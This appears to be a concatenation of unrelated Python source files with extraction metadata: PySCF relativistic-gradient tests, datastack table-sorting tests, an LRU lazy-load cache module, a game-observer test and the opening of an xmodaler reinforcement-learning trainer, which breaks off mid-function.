e0, c0 = scipy.linalg.eigh(h0, s0)
get_h1_etc = sfx2c1e_grad._gen_first_order_quantities(mol, e0, c0, x0)
R1 = get_h1_etc(0)[6][2]
self.assertAlmostEqual(abs(R1-R1t).max(), 0, 9)
def test_hfw(self):
with lib.light_speed(10) as c:
x2c_1 = sfx2c1e.SpinFreeX2C(mol1)
x2c_2 = sfx2c1e.SpinFreeX2C(mol2)
x2cobj = sfx2c1e.SpinFreeX2C(mol)
fh_ref = (x2c_1.get_hcore() - x2c_2.get_hcore()) / 0.0002 * lib.param.BOHR
fh = x2cobj.hcore_deriv_generator(deriv=1)
self.assertAlmostEqual(abs(fh(0)[2] - fh_ref).max(), 0, 7)
x2c_1.xuncontract = 0
x2c_2.xuncontract = 0
x2cobj.xuncontract =0
fh_ref = (x2c_1.get_hcore() - x2c_2.get_hcore()) / 0.0002 * lib.param.BOHR
fh = x2cobj.hcore_deriv_generator(deriv=1)
self.assertAlmostEqual(abs(fh(0)[2] - fh_ref).max(), 0, 7)
x2c_1.xuncontract = 1
x2c_2.xuncontract = 1
x2cobj.xuncontract =1
x2c_1.approx = 'ATOM1E'
x2c_2.approx = 'ATOM1E'
x2cobj.approx = 'ATOM1E'
fh_ref = (x2c_1.get_hcore() - x2c_2.get_hcore()) / 0.0002 * lib.param.BOHR
fh = x2cobj.hcore_deriv_generator(deriv=1)
self.assertAlmostEqual(abs(fh(0)[2] - fh_ref).max(), 0, 7)
if __name__ == "__main__":
print("Full Tests for sfx2c1e gradients")
unittest.main()
|
[
"unittest.main",
"numpy.zeros_like",
"pyscf.x2c.sfx2c1e.SpinFreeX2C",
"numpy.asarray",
"numpy.zeros",
"numpy.einsum",
"pyscf.lib.light_speed",
"pyscf.gto.M",
"pyscf.x2c.sfx2c1e_grad._gen_first_order_quantities",
"functools.reduce",
"numpy.sqrt"
] |
[((6199, 6321), 'pyscf.gto.M', 'gto.M', ([], {'verbose': '(0)', 'atom': "[['O', (0.0, 0.0, 0.0001)], [1, (0.0, -0.757, 0.587)], [1, (0.0, 0.757, 0.587)]\n ]", 'basis': '"""3-21g"""'}), "(verbose=0, atom=[['O', (0.0, 0.0, 0.0001)], [1, (0.0, -0.757, 0.587)],\n [1, (0.0, 0.757, 0.587)]], basis='3-21g')\n", (6204, 6321), False, 'from pyscf import gto\n'), ((6385, 6509), 'pyscf.gto.M', 'gto.M', ([], {'verbose': '(0)', 'atom': "[['O', (0.0, 0.0, -0.0001)], [1, (0.0, -0.757, 0.587)], [1, (0.0, 0.757, \n 0.587)]]", 'basis': '"""3-21g"""'}), "(verbose=0, atom=[['O', (0.0, 0.0, -0.0001)], [1, (0.0, -0.757, 0.587)\n ], [1, (0.0, 0.757, 0.587)]], basis='3-21g')\n", (6390, 6509), False, 'from pyscf import gto\n'), ((6570, 6690), 'pyscf.gto.M', 'gto.M', ([], {'verbose': '(0)', 'atom': "[['O', (0.0, 0.0, 0.0)], [1, (0.0, -0.757, 0.587)], [1, (0.0, 0.757, 0.587)]]", 'basis': '"""3-21g"""'}), "(verbose=0, atom=[['O', (0.0, 0.0, 0.0)], [1, (0.0, -0.757, 0.587)], [\n 1, (0.0, 0.757, 0.587)]], basis='3-21g')\n", (6575, 6690), False, 'from pyscf import gto\n'), ((1123, 1136), 'numpy.sqrt', 'numpy.sqrt', (['w'], {}), '(w)\n', (1133, 1136), False, 'import numpy\n'), ((1910, 1951), 'functools.reduce', 'reduce', (['numpy.dot', '(s0invsqrt, R, s0sqrt)'], {}), '(numpy.dot, (s0invsqrt, R, s0sqrt))\n', (1916, 1951), False, 'from functools import reduce\n'), ((2300, 2320), 'numpy.zeros_like', 'numpy.zeros_like', (['s0'], {}), '(s0)\n', (2316, 2320), False, 'import numpy\n'), ((2330, 2350), 'numpy.zeros_like', 'numpy.zeros_like', (['t0'], {}), '(t0)\n', (2346, 2350), False, 'import numpy\n'), ((2686, 2736), 'functools.reduce', 'reduce', (['numpy.dot', '(x1.T, t0 * (0.5 / c ** 2), x0)'], {}), '(numpy.dot, (x1.T, t0 * (0.5 / c ** 2), x0))\n', (2692, 2736), False, 'from functools import reduce\n'), ((2740, 2790), 'functools.reduce', 'reduce', (['numpy.dot', '(x0.T, t0 * (0.5 / c ** 2), x1)'], {}), '(numpy.dot, (x0.T, t0 * (0.5 / c ** 2), x1))\n', (2746, 2790), False, 'from functools import reduce\n'), ((2919, 2967), 'functools.reduce', 'reduce', (['numpy.dot', '(s0_invsqrt, sa0, s0_invsqrt)'], {}), '(numpy.dot, (s0_invsqrt, sa0, s0_invsqrt))\n', (2925, 2967), False, 'from functools import reduce\n'), ((3635, 3671), 'numpy.zeros', 'numpy.zeros', (['(n2, n2)'], {'dtype': 'v.dtype'}), '((n2, n2), dtype=v.dtype)\n', (3646, 3671), False, 'import numpy\n'), ((3679, 3715), 'numpy.zeros', 'numpy.zeros', (['(n2, n2)'], {'dtype': 'v.dtype'}), '((n2, n2), dtype=v.dtype)\n', (3690, 3715), False, 'import numpy\n'), ((4453, 4493), 'numpy.zeros', 'numpy.zeros', (['(3, n2, n2)'], {'dtype': 'v1.dtype'}), '((3, n2, n2), dtype=v1.dtype)\n', (4464, 4493), False, 'import numpy\n'), ((4500, 4540), 'numpy.zeros', 'numpy.zeros', (['(3, n2, n2)'], {'dtype': 'v1.dtype'}), '((3, n2, n2), dtype=v1.dtype)\n', (4511, 4540), False, 'import numpy\n'), ((4731, 4751), 'numpy.zeros_like', 'numpy.zeros_like', (['s1'], {}), '(s1)\n', (4747, 4751), False, 'import numpy\n'), ((4763, 4783), 'numpy.zeros_like', 'numpy.zeros_like', (['t1'], {}), '(t1)\n', (4779, 4783), False, 'import numpy\n'), ((5988, 6023), 'numpy.einsum', 'numpy.einsum', (['"""pq,xqi->xpi"""', 'c0', 'c1'], {}), "('pq,xqi->xpi', c0, c1)\n", (6000, 6023), False, 'import numpy\n'), ((6173, 6190), 'numpy.asarray', 'numpy.asarray', (['x1'], {}), '(x1)\n', (6186, 6190), False, 'import numpy\n'), ((9169, 9184), 'unittest.main', 'unittest.main', ([], {}), '()\n', (9182, 9184), False, 'import unittest\n'), ((1391, 1404), 'numpy.sqrt', 'numpy.sqrt', (['w'], {}), '(w)\n', (1401, 1414), False, 'import numpy\n'), ((1463, 1509), 'numpy.einsum', 'numpy.einsum', (['"""i,ij,j->ij"""', '(w ** 2)', 'a1', '(w ** 2)'], {}), "('i,ij,j->ij', w ** 2, a1, w ** 2)\n", (1475, 1509), False, 'import numpy\n'), ((1790, 1840), 'functools.reduce', 'reduce', (['numpy.dot', '(x0.T, t0 * (0.5 / c ** 2), x0)'], {}), '(numpy.dot, (x0.T, t0 * (0.5 / c ** 2), x0))\n', (1796, 1840), False, 'from functools import reduce\n'), ((1852, 1900), 'functools.reduce', 'reduce', (['numpy.dot', '(s0invsqrt, stild, s0invsqrt)'], {}), '(numpy.dot, (s0invsqrt, stild, s0invsqrt))\n', (1858, 1900), False, 'from functools import reduce\n'), ((2573, 2623), 'functools.reduce', 'reduce', (['numpy.dot', '(x0.T, t0 * (0.5 / c ** 2), x0)'], {}), '(numpy.dot, (x0.T, t0 * (0.5 / c ** 2), x0))\n', (2579, 2623), False, 'from functools import reduce\n'), ((2632, 2682), 'functools.reduce', 'reduce', (['numpy.dot', '(x0.T, t1 * (0.5 / c ** 2), x0)'], {}), '(numpy.dot, (x0.T, t1 * (0.5 / c ** 2), x0))\n', (2638, 2682), False, 'from functools import reduce\n'), ((3115, 3163), 'functools.reduce', 'reduce', (['numpy.dot', '(s0_invsqrt, sa0, s1_invsqrt)'], {}), '(numpy.dot, (s0_invsqrt, sa0, s1_invsqrt))\n', (3121, 3163), False, 'from functools import reduce\n'), ((892, 905), 'numpy.sqrt', 'numpy.sqrt', (['w'], {}), '(w)\n', (902, 905), False, 'import numpy\n'), ((993, 1006), 'numpy.sqrt', 'numpy.sqrt', (['w'], {}), '(w)\n', (1003, 1006), False, 'import numpy\n'), ((2983, 3031), 'functools.reduce', 'reduce', (['numpy.dot', '(s0_invsqrt, sa1, s0_invsqrt)'], {}), '(numpy.dot, (s0_invsqrt, sa1, s0_invsqrt))\n', (2989, 3031), False, 'from functools import reduce\n'), ((3049, 3097), 'functools.reduce', 'reduce', (['numpy.dot', '(s1_invsqrt, sa0, s0_invsqrt)'], {}), '(numpy.dot, (s1_invsqrt, sa0, s0_invsqrt))\n', (3055, 3097), False, 'from functools import reduce\n'), ((6823, 6842), 'pyscf.lib.light_speed', 'lib.light_speed', (['(10)'], {}), '(10)\n', (6838, 6842), False, 'from pyscf import lib\n'), ((7208, 7265), 'pyscf.x2c.sfx2c1e_grad._gen_first_order_quantities', 'sfx2c1e_grad._gen_first_order_quantities', (['mol', 'e0', 'c0', 'x0'], {}), '(mol, e0, c0, x0)\n', (7248, 7265), False, 'from pyscf.x2c import sfx2c1e_grad\n'), ((7397, 7416), 'pyscf.lib.light_speed', 'lib.light_speed', (['(10)'], {}), '(10)\n', (7412, 7416), False, 'from pyscf import lib\n'), ((7780, 7837), 'pyscf.x2c.sfx2c1e_grad._gen_first_order_quantities', 'sfx2c1e_grad._gen_first_order_quantities', (['mol', 'e0', 'c0', 'x0'], {}), '(mol, e0, c0, x0)\n', (7820, 7837), False, 'from pyscf.x2c import sfx2c1e_grad\n'), ((7973, 7992), 'pyscf.lib.light_speed', 'lib.light_speed', (['(10)'], {}), '(10)\n', (7988, 7992), False, 'from pyscf import lib\n'), ((8019, 8044), 'pyscf.x2c.sfx2c1e.SpinFreeX2C', 'sfx2c1e.SpinFreeX2C', (['mol1'], {}), '(mol1)\n', (8038, 8044), False, 'from pyscf.x2c import sfx2c1e\n'), ((8065, 8090), 'pyscf.x2c.sfx2c1e.SpinFreeX2C', 'sfx2c1e.SpinFreeX2C', (['mol2'], {}), '(mol2)\n', (8084, 8090), False, 'from pyscf.x2c import sfx2c1e\n'), ((8112, 8136), 'pyscf.x2c.sfx2c1e.SpinFreeX2C', 'sfx2c1e.SpinFreeX2C', (['mol'], {}), '(mol)\n', (8131, 8136), False, 'from pyscf.x2c import sfx2c1e\n')]
|
from datastack import DataTable, DataColumn, label, col, desc
import pytest
import numpy as np
def test_one():
tbl = (DataTable(a=(1,2,1,2,3,1), b=(4,5,6,3,2,1),c=(6,7,8,1,2,3))
.order_by(desc(label("b")))
)
exp = DataTable(a=(1,2,1,2,3,1), b=(6,5,4,3,2,1), c=(8,7,6,1,2,3))
assert tbl == exp
def test_one_str():
tbl = (DataTable(a=(1,2,1,2,3,1), b=(4,5,6,3,2,1),c=list("abcdef"))
.order_by(label("b"))
)
exp = DataTable(a=(1,3,2,1,2,1), b=(1,2,3,4,5,6), c=list("fedabc"))
assert tbl == exp
def test_two():
tbl = (DataTable(b=(4,5,2,3,2,1),c=(6,7,8,1,2,3),a=(1,2,1,2,3,1))
.order_by(label("b"), desc(label("a")), label("c"), )
)
exp = DataTable( b=(1,2,2,3,4,5), c=(3,2,8,1,6,7),a=(1,3,1,2,1,2))
assert tbl == exp
def test_two_asc():
data = {"col1": np.array((1, 2, 3, 4, 5, 4, 3, 2, 1)),
"col2": np.array(list("abcdeabcd")),
"col3": np.array((10, 11, 9, 8, 7, 2, 12, 100, 1))}
tbl = (DataTable.from_dict(data)
.order_by(label("col1"), label("col2"))
)
exp = DataTable.from_dict({'col1': np.array([1, 1, 2, 2, 3, 3, 4, 4, 5]),
'col2': np.array(['a', 'd', 'b', 'c', 'b', 'c', 'a', 'd', 'e']),
'col3': np.array([10, 1, 11, 100, 12, 9, 2, 8, 7])})
assert tbl == exp
def test_two_asc_desc():
data = {"col1": np.array((1, 2, 3, 4, 5, 4, 3, 2, 1)),
"col2": np.array(list("abcdeabcd")),
"col3": np.array((10, 11, 9, 8, 7, 2, 12, 100, 1))}
tbl = (DataTable.from_dict(data)
.order_by(label("col1"), desc(label("col2")))
)
exp = DataTable.from_dict({'col1': np.array([1, 1, 2, 2, 3, 3, 4, 4, 5]),
'col2': np.array(['d', 'a', 'c', 'b', 'c', 'b', 'd', 'a', 'e']),
'col3': np.array([1, 10, 100, 11, 9, 12, 8, 2, 7])})
assert tbl == exp
|
[
"datastack.DataTable",
"datastack.DataTable.from_dict",
"numpy.array",
"datastack.label"
] |
[((245, 320), 'datastack.DataTable', 'DataTable', ([], {'a': '(1, 2, 1, 2, 3, 1)', 'b': '(6, 5, 4, 3, 2, 1)', 'c': '(8, 7, 6, 1, 2, 3)'}), '(a=(1, 2, 1, 2, 3, 1), b=(6, 5, 4, 3, 2, 1), c=(8, 7, 6, 1, 2, 3))\n', (254, 320), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((732, 807), 'datastack.DataTable', 'DataTable', ([], {'b': '(1, 2, 2, 3, 4, 5)', 'c': '(3, 2, 8, 1, 6, 7)', 'a': '(1, 3, 1, 2, 1, 2)'}), '(b=(1, 2, 2, 3, 4, 5), c=(3, 2, 8, 1, 6, 7), a=(1, 3, 1, 2, 1, 2))\n', (741, 807), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((441, 451), 'datastack.label', 'label', (['"""b"""'], {}), "('b')\n", (446, 451), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((666, 676), 'datastack.label', 'label', (['"""b"""'], {}), "('b')\n", (671, 676), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((696, 706), 'datastack.label', 'label', (['"""c"""'], {}), "('c')\n", (701, 706), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((858, 895), 'numpy.array', 'np.array', (['(1, 2, 3, 4, 5, 4, 3, 2, 1)'], {}), '((1, 2, 3, 4, 5, 4, 3, 2, 1))\n', (866, 895), True, 'import numpy as np\n'), ((958, 1000), 'numpy.array', 'np.array', (['(10, 11, 9, 8, 7, 2, 12, 100, 1)'], {}), '((10, 11, 9, 8, 7, 2, 12, 100, 1))\n', (966, 1000), True, 'import numpy as np\n'), ((1064, 1077), 'datastack.label', 'label', (['"""col1"""'], {}), "('col1')\n", (1069, 1077), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((1079, 1092), 'datastack.label', 'label', (['"""col2"""'], {}), "('col2')\n", (1084, 1092), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((1444, 1481), 'numpy.array', 'np.array', (['(1, 2, 3, 4, 5, 4, 3, 2, 1)'], {}), '((1, 2, 3, 4, 5, 4, 3, 2, 1))\n', (1452, 1481), True, 'import numpy as np\n'), ((1544, 1586), 'numpy.array', 'np.array', (['(10, 11, 9, 8, 7, 2, 12, 100, 1)'], {}), '((10, 11, 9, 8, 7, 2, 12, 100, 1))\n', (1552, 1586), True, 'import numpy as np\n'), ((1650, 1663), 'datastack.label', 'label', (['"""col1"""'], {}), "('col1')\n", (1655, 1663), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((125, 200), 'datastack.DataTable', 'DataTable', ([], {'a': '(1, 2, 1, 2, 3, 1)', 'b': '(4, 5, 6, 3, 2, 1)', 'c': '(6, 7, 8, 1, 2, 3)'}), '(a=(1, 2, 1, 2, 3, 1), b=(4, 5, 6, 3, 2, 1), c=(6, 7, 8, 1, 2, 3))\n', (134, 200), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((210, 220), 'datastack.label', 'label', (['"""b"""'], {}), "('b')\n", (215, 220), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((587, 662), 'datastack.DataTable', 'DataTable', ([], {'b': '(4, 5, 2, 3, 2, 1)', 'c': '(6, 7, 8, 1, 2, 3)', 'a': '(1, 2, 1, 2, 3, 1)'}), '(b=(4, 5, 2, 3, 2, 1), c=(6, 7, 8, 1, 2, 3), a=(1, 2, 1, 2, 3, 1))\n', (596, 662), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((683, 693), 'datastack.label', 'label', (['"""a"""'], {}), "('a')\n", (688, 693), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((1016, 1041), 'datastack.DataTable.from_dict', 'DataTable.from_dict', (['data'], {}), '(data)\n', (1035, 1041), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((1143, 1180), 'numpy.array', 'np.array', (['[1, 1, 2, 2, 3, 3, 4, 4, 5]'], {}), '([1, 1, 2, 2, 3, 3, 4, 4, 5])\n', (1151, 1180), True, 'import numpy as np\n'), ((1226, 1281), 'numpy.array', 'np.array', (["['a', 'd', 'b', 'c', 'b', 'c', 'a', 'd', 'e']"], {}), "(['a', 'd', 'b', 'c', 'b', 'c', 'a', 'd', 'e'])\n", (1234, 1281), True, 'import numpy as np\n'), ((1327, 1369), 'numpy.array', 'np.array', (['[10, 1, 11, 100, 12, 9, 2, 8, 7]'], {}), '([10, 1, 11, 100, 12, 9, 2, 8, 7])\n', (1335, 1369), True, 'import numpy as np\n'), ((1602, 1627), 'datastack.DataTable.from_dict', 'DataTable.from_dict', (['data'], {}), '(data)\n', (1621, 1627), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((1670, 1683), 'datastack.label', 'label', (['"""col2"""'], {}), "('col2')\n", (1675, 1683), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((1735, 1772), 'numpy.array', 'np.array', (['[1, 1, 2, 2, 3, 3, 4, 4, 5]'], {}), '([1, 1, 2, 2, 3, 3, 4, 4, 5])\n', (1743, 1772), True, 'import numpy as np\n'), ((1783, 1838), 'numpy.array', 'np.array', (["['d', 'a', 'c', 'b', 'c', 'b', 'd', 'a', 'e']"], {}), "(['d', 'a', 'c', 'b', 'c', 'b', 'd', 'a', 'e'])\n", (1791, 1838), True, 'import numpy as np\n'), ((1849, 1891), 'numpy.array', 'np.array', (['[1, 10, 100, 11, 9, 12, 8, 2, 7]'], {}), '([1, 10, 100, 11, 9, 12, 8, 2, 7])\n', (1857, 1891), True, 'import numpy as np\n')]
|
import collections
import logging
import os
import re
from sys import getsizeof
from threading import Event, RLock
from typing import Any, Callable, Dict, Hashable, Tuple, TypeVar, Union
import numpy as np
from cachetools import Cache
from humanize import naturalsize
CachedItemType = TypeVar("CachedItemType")
logger = logging.getLogger(__name__)
SHOW_CACHE_LOGS = os.environ.get("SHOW_CACHE_LOGS", False)
class CacheFullException(Exception):
...
class CacheEmptyException(Exception):
...
class LazyLoadCache(Cache):
"""Least Recently Used (LRU) cache implementation."""
_marker = object()
def __init__(self, cache_name: str = "Default pd-sdk Cache", cache_max_size: str = "1GiB"):
self.cache_name = cache_name
self._maximum_allowed_bytes: int = byte_str_to_bytes(byte_str=cache_max_size)
logger.info(
f"Initializing LazyLoadCache '{cache_name}' with available "
f"space of {naturalsize(self._maximum_allowed_bytes)}."
)
self._key_load_locks: Dict[Hashable, Tuple[RLock, Event]] = dict()
self._create_key_lock = RLock()
Cache.__init__(self, maxsize=self._maximum_allowed_bytes, getsizeof=LazyLoadCache.getsizeof)
self.__order = collections.OrderedDict()
def get_item(self, key: Hashable, loader: Callable[[], CachedItemType]) -> CachedItemType:
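        # Per-key double-checked locking: only one thread runs the loader for a
        # given key; concurrent callers block on the lock and then read the cache.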
key_lock, wait_event = self._get_locks(key=key)
with key_lock:
if key not in self:
if SHOW_CACHE_LOGS:
logger.debug(f"load key {key} to cache")
value = loader()
try:
self[key] = value
except CacheFullException as e:
logger.warning(f"Cant store {key} in Cache since no more space is left! {str(e)}")
return value
wait_event.set()
return value
return self[key]
def __missing__(self, key):
raise KeyError(key)
def __getitem__(self, key: Hashable, cache_getitem: Callable[[Cache, Hashable], Any] = Cache.__getitem__):
value = cache_getitem(self, key)
if key in self: # __missing__ may not store item
self.__update(key)
return value
def __setitem__(self, key: Hashable, value, cache_setitem=Cache.__setitem__):
self._custom_set_item(key, value)
self.__update(key)
def _get_locks(self, key: Hashable) -> Tuple[RLock, Event]:
if key not in self._key_load_locks:
with self._create_key_lock:
if key not in self._key_load_locks:
self._key_load_locks[key] = (RLock(), Event())
return self._key_load_locks[key]
def _custom_set_item(self, key, value):
size = self.getsizeof(value)
if SHOW_CACHE_LOGS:
logger.debug(f"add item {key} with size {naturalsize(size)}")
if size > self.maxsize:
raise ValueError("value too large")
if key not in self._Cache__data or self._Cache__size[key] < size:
self.free_space_for_n_bytes(n_bytes=size)
if key in self._Cache__data:
diffsize = size - self._Cache__size[key]
else:
diffsize = size
self._Cache__data[key] = value
self._Cache__size[key] = size
self._Cache__currsize += diffsize
def __delitem__(self, key: Hashable, cache_delitem=Cache.__delitem__):
key_lock, wait_event = self._get_locks(key=key)
with key_lock:
if wait_event.is_set():
if SHOW_CACHE_LOGS:
logger.debug(f"delete {key} from cache")
cache_delitem(self, key)
del self.__order[key]
wait_event.clear()
def free_space_for_n_bytes(self, n_bytes: Union[float, int]):
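        # Evict least-recently-used items until n_bytes fit; raise
        # CacheFullException if even an empty cache cannot hold them.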
try:
while n_bytes > self.free_space:
self.popitem()
except CacheEmptyException:
if n_bytes > self.free_space:
raise CacheFullException(
f"Cache is already empty but there is no more space left tho store {n_bytes}B!"
)
@property
def maxsize(self) -> int:
"""The maximum size of the cache."""
return self._maximum_allowed_bytes
@maxsize.setter
def maxsize(self, value: Union[str, int]):
if isinstance(value, int):
self._maximum_allowed_bytes = value
elif isinstance(value, str):
self._maximum_allowed_bytes: int = byte_str_to_bytes(byte_str=value)
else:
raise ValueError(f"invalid type for maxsite {type(value)}! Has to be int or str.")
logger.info(f"Changed '{self.cache_name}' available space to {naturalsize(self._maximum_allowed_bytes)}.")
# If size got smaller make sure cache is cleared up
self.free_space_for_n_bytes(n_bytes=0)
@property
def currsize(self) -> int:
"""The current size of the cache."""
return int(self._Cache__currsize)
@property
def free_space(self) -> int:
"""The maximum size of the caches free space."""
remaining_allowed_space = self.maxsize - self.currsize
return remaining_allowed_space
def popitem(self):
"""Remove and return the `(key, value)` pair least recently used."""
try:
it = iter(list(self.__order.keys()))
key = next(it)
except StopIteration:
raise CacheEmptyException("%s is empty" % type(self).__name__)
else:
del self[key]
def pop(self, key, default=_marker):
key_lock, wait_event = self._get_locks(key=key)
with key_lock:
if key in self:
value = self[key]
del self[key]
elif default is LazyLoadCache._marker:
raise KeyError(key)
else:
value = default
return value
def clear(self):
"D.clear() -> None. Remove all items from D."
try:
while True:
self.popitem()
except CacheEmptyException:
pass
def __update(self, key):
try:
self.__order.move_to_end(key)
except KeyError:
self.__order[key] = None
@staticmethod
def getsizeof(value, seen=None):
"""Return the size of a cache element's value."""
# handle recursion
if seen is None:
seen = set()
obj_id = id(value)
if obj_id in seen:
return 0
seen.add(obj_id)
size = getsizeof(value)
if hasattr(value, "__dict__"):
pass
# for k, v in value.__dict__.items():
# size += getsizeof(v)
elif isinstance(value, list):
for i in value:
size += LazyLoadCache.getsizeof(i, seen)
elif isinstance(value, dict):
for k, v in value.items():
size += LazyLoadCache.getsizeof(v, seen)
elif isinstance(value, np.ndarray):
size = value.nbytes
return size
def byte_str_to_bytes(byte_str: str) -> int:
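    # Parse byte strings such as "1GiB", "500MB" or "8kb": an optional SI
    # prefix (k..Y), an optional "i" switching to base 1024, and "b"/"B"
    # selecting bits vs. bytes.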
split_numbers_and_letters = re.match(r"([.0-9]+)([kKMGTPEZY]*)([i]*)([bB]+)", byte_str.replace(" ", ""), re.I)
powers = {"": 0, "k": 1, "m": 2, "g": 3, "t": 4, "p": 5, "e": 6, "z": 7, "y": 8}
if split_numbers_and_letters is None:
raise ValueError(
f"Invalid byte string format {byte_str}. `byte_str` has to be an integer string followed by a byte unit."
)
number, power_letter, base_letter, bites_or_bytes = split_numbers_and_letters.groups()
bit_factor = 1 if bites_or_bytes == "B" else 1 / 8
base = 1024 if base_letter == "i" else 1000
power = powers[power_letter.lower()]
number = float(number)
    total_bytes = number * base**power * bit_factor
    return int(total_bytes)
cache_max_ram_usage_factor = float(os.environ.get("CACHE_MAX_USAGE_FACTOR", 0.1)) # 10% free space max
cache_max_size = os.environ.get("CACHE_MAX_BYTES", "1GiB")
if "CACHE_MAX_USAGE_FACTOR" in os.environ:
logger.warning(
"CACHE_MAX_USAGE_FACTOR is not longer supported! Use CACHE_MAX_BYTES instead to set a cache size in bytes!"
)
LAZY_LOAD_CACHE = LazyLoadCache(cache_max_size=cache_max_size)
|
[
"threading.RLock",
"os.environ.get",
"cachetools.Cache.__init__",
"threading.Event",
"sys.getsizeof",
"collections.OrderedDict",
"typing.TypeVar",
"logging.getLogger",
"humanize.naturalsize"
] |
[((287, 312), 'typing.TypeVar', 'TypeVar', (['"""CachedItemType"""'], {}), "('CachedItemType')\n", (294, 312), False, 'from typing import Any, Callable, Dict, Hashable, Tuple, TypeVar, Union\n'), ((323, 350), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (340, 350), False, 'import logging\n'), ((370, 410), 'os.environ.get', 'os.environ.get', (['"""SHOW_CACHE_LOGS"""', '(False)'], {}), "('SHOW_CACHE_LOGS', False)\n", (384, 410), False, 'import os\n'), ((8030, 8071), 'os.environ.get', 'os.environ.get', (['"""CACHE_MAX_BYTES"""', '"""1GiB"""'], {}), "('CACHE_MAX_BYTES', '1GiB')\n", (8044, 8071), False, 'import os\n'), ((7944, 7989), 'os.environ.get', 'os.environ.get', (['"""CACHE_MAX_USAGE_FACTOR"""', '(0.1)'], {}), "('CACHE_MAX_USAGE_FACTOR', 0.1)\n", (7958, 7989), False, 'import os\n'), ((1118, 1125), 'threading.RLock', 'RLock', ([], {}), '()\n', (1123, 1125), False, 'from threading import Event, RLock\n'), ((1134, 1231), 'cachetools.Cache.__init__', 'Cache.__init__', (['self'], {'maxsize': 'self._maximum_allowed_bytes', 'getsizeof': 'LazyLoadCache.getsizeof'}), '(self, maxsize=self._maximum_allowed_bytes, getsizeof=\n LazyLoadCache.getsizeof)\n', (1148, 1231), False, 'from cachetools import Cache\n'), ((1250, 1275), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (1273, 1275), False, 'import collections\n'), ((6608, 6624), 'sys.getsizeof', 'getsizeof', (['value'], {}), '(value)\n', (6617, 6624), False, 'from sys import getsizeof\n'), ((956, 996), 'humanize.naturalsize', 'naturalsize', (['self._maximum_allowed_bytes'], {}), '(self._maximum_allowed_bytes)\n', (967, 996), False, 'from humanize import naturalsize\n'), ((4755, 4795), 'humanize.naturalsize', 'naturalsize', (['self._maximum_allowed_bytes'], {}), '(self._maximum_allowed_bytes)\n', (4766, 4795), False, 'from humanize import naturalsize\n'), ((2673, 2680), 'threading.RLock', 'RLock', ([], {}), '()\n', (2678, 2680), False, 'from threading import Event, RLock\n'), ((2682, 2689), 'threading.Event', 'Event', ([], {}), '()\n', (2687, 2689), False, 'from threading import Event, RLock\n'), ((2895, 2912), 'humanize.naturalsize', 'naturalsize', (['size'], {}), '(size)\n', (2906, 2912), False, 'from humanize import naturalsize\n')]
|
import pytest
from unittest import mock
from unittest.mock import AsyncMock, MagicMock
from src.bot.gameobservers.WinGameChatObserver import WinGameChatObserver
class TestNumberGameObservers:
@pytest.mark.asyncio
async def test_win_chat_announce_winners(self):
"""tests winning messages are called when the game is over"""
mock_subject = AsyncMock()
mock_subject.won = True
mock_subject.winning_team_id = 1
team_one = "Team 1"
team_names = ["User 1", "User 2"]
mock_subject.team_data = MagicMock()
mock_subject.team_data.get_team_member_map = MagicMock()
mock_subject.team_data.get_team_member_map.return_value = {1: ['id1', 'id2']}
winGameChatObserver = WinGameChatObserver()
winGameChatObserver.get_team_name = MagicMock()
winGameChatObserver.get_team_name.return_value = team_one
winGameChatObserver.get_usernames = MagicMock()
winGameChatObserver.get_usernames.return_value = team_names
await winGameChatObserver.update(mock_subject)
mock_subject.send_message.assert_called()
|
[
"unittest.mock.AsyncMock",
"unittest.mock.MagicMock",
"src.bot.gameobservers.WinGameChatObserver.WinGameChatObserver"
] |
[((365, 376), 'unittest.mock.AsyncMock', 'AsyncMock', ([], {}), '()\n', (374, 376), False, 'from unittest.mock import AsyncMock, MagicMock\n'), ((556, 567), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (565, 567), False, 'from unittest.mock import AsyncMock, MagicMock\n'), ((621, 632), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (630, 632), False, 'from unittest.mock import AsyncMock, MagicMock\n'), ((749, 770), 'src.bot.gameobservers.WinGameChatObserver.WinGameChatObserver', 'WinGameChatObserver', ([], {}), '()\n', (768, 770), False, 'from src.bot.gameobservers.WinGameChatObserver import WinGameChatObserver\n'), ((815, 826), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (824, 826), False, 'from unittest.mock import AsyncMock, MagicMock\n'), ((937, 948), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (946, 948), False, 'from unittest.mock import AsyncMock, MagicMock\n')]
|
# Copyright 2021 JD.com, Inc., JD AI
"""
@author: <NAME>
@contact: <EMAIL>
"""
import time
import copy
import torch
from .defaults import DefaultTrainer
from xmodaler.scorer import build_scorer
from xmodaler.config import kfg
from xmodaler.losses import build_rl_losses
import xmodaler.utils.comm as comm
from .build import ENGINE_REGISTRY
__all__ = ['RLTrainer']
@ENGINE_REGISTRY.register()
class RLTrainer(DefaultTrainer):
def __init__(self, cfg):
super(RLTrainer, self).__init__(cfg)
self.scorer = self.build_scorer(cfg)
self.losses = build_rl_losses(cfg)
@classmethod
def build_scorer(cls, cfg):
return build_scorer(cfg)
def run_step(self):
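        # Self-critical training step: score a baseline decode without gradients,
        # then a sampled decode; the reward passed to the RL losses is the
        # sampled score minus the baseline score.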
start = time.perf_counter()
try:
data = next(self._train_data_loader_iter)
except StopIteration:
self._train_data_loader_iter = iter(self.train_data_loader)
data = next(self._train_data_loader_iter)
data_time = time.perf_counter() - start
data = comm.unwrap_model(self.model).preprocess_batch(data)
self.model.eval()
with torch.no_grad():
bs_data = copy.copy(data)
